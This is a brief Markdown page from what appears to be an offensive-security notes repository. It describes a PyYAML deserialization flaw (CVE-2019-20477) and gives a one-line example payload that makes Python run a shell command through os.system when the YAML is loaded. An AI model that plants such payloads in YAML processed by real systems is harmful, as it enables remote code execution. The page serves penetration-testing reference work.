whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Exploits/Web/YAML Deserialization.md

14 lines
363 B
Markdown
Raw Blame History

# YAML Deserialization
* [CVE-2019-20477](https://packetstormsecurity.com/files/cve/CVE-2019-20477)
* RCE via Yaml execution by Python
* [jolt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
## Usage
* Example Payload insid foo.yaml gets executed via Python
```sh
!!python/object/apply:os.system ["id"]
```
Reference in New Issue View Git Blame Copy Permalink